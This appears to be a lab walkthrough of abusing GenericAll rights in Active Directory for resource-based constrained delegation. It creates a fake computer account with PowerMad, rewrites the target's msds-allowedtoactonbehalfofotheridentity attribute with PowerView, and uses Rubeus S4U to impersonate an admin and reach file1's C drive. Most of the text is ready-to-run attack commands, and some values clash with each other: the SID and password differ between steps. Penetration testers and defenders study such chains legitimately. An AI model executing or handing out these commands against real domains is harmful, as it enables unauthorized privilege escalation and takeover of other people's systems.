Take the following scenario:
data:image/s3,"s3://crabby-images/ea675/ea675e1bba12293f80dc83d6541e995478b8df31" alt=""
Our standard user Ted has GenericAll writes over file1.jango.com. However, how do we take advantage of this privilege, first lets just prove we don’t have access to the target server:
data:image/s3,"s3://crabby-images/f5b82/f5b82f5c1fbe7f4ebc880b63aace4ab549a58e8a" alt=""
We will need the following info (track this as you go):
Target Computer Name: file1.jango.com
Admin on Target Computer: administrator
Fake Computer Name: fakecomputer
Fake Computer Sid: S-1-5-21-759278571-4292840072-3113789661-1116
Fake Computer Password: Password1
Using PowerMad we can create a fake computer system, any domain user can do this in the domain:
import-module PowerMad.ps1
New-MachineAccount -MachineAccount fakecomputer -Password $(ConvertTo-SecureString 'Password1' -AsPlainText -Force)
data:image/s3,"s3://crabby-images/5a0ba/5a0bac264b5fb9b21bf5900a21a07d6ec21e3606" alt=""
Get the SID for the new fakecomputer object with PowerView:
Get-DomainComputer fakecomputer -Properties objectsid | Select -Expand objectsid
data:image/s3,"s3://crabby-images/985df/985dfc897b7e19abf862f8ba5162b2739c6965b7" alt=""
Next, build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-759278571-4292840072-3113789661-1119)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer file1 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
No output will be generated for this, so to verify this has worked run the following:
$RawBytes = Get-DomainComputer file1 -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity; $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0; $Descriptor.DiscretionaryAcl
We can see that the ACE has been built:
data:image/s3,"s3://crabby-images/eeef4/eeef4edf688e76fab676e9102d99f1a5577b6dc7" alt=""
NOTE: This will modify the ‘msds-allowedtoactonbehalfofotheridentity’ of the target computer system!!!!!!!
Now our our new machine fakecomputer is trusted by by file1 we can forge a ticket with Rubeus:
First we need the rc4_hmac (ntlm):
Rubeus hash /password:Summer2018! /user:fakecomputer /domain:jango.com
The we can craft the ticket:
data:image/s3,"s3://crabby-images/f4d02/f4d02cecc01d8186937f6a050681705b80f8e97d" alt=""
Rubeus s4u /user:fakecomputer$ /rc4:64F12CDDAA88057E06A81B54E73B949B /impersonateuser:bob_adm /msdsspn:cifs/file1.jango.com /ptt
data:image/s3,"s3://crabby-images/7e72a/7e72aeca73ee07e8d5aa43e280ed8db83ac0dde4" alt=""
Verify we can now access the C:\ drive of the target machine. NOTE: the above ticket has been crafted specifically for access to the target machine for that service ONLY:
data:image/s3,"s3://crabby-images/51258/51258ebba90e77b756fa7aa97aebe93c03133b47" alt=""
We can also verify by looking at the tickets with built in klist and then Rubeus:
data:image/s3,"s3://crabby-images/2a1d1/2a1d12815fcd3aa52a7cbaa1bd45a385b469ded6" alt=""
data:image/s3,"s3://crabby-images/ffd67/ffd671749084383023ff98d91ed978533211a3eb" alt=""
Finally to cleanup the modified AD object and clear the ‘msds-allowedtoactonbehalfofotheridentity’ attribute with PowerView:
Get-DomainComputer file1 | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'
Thanks to both harmj0y and wald0 for these excellent posts on the subject:
https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/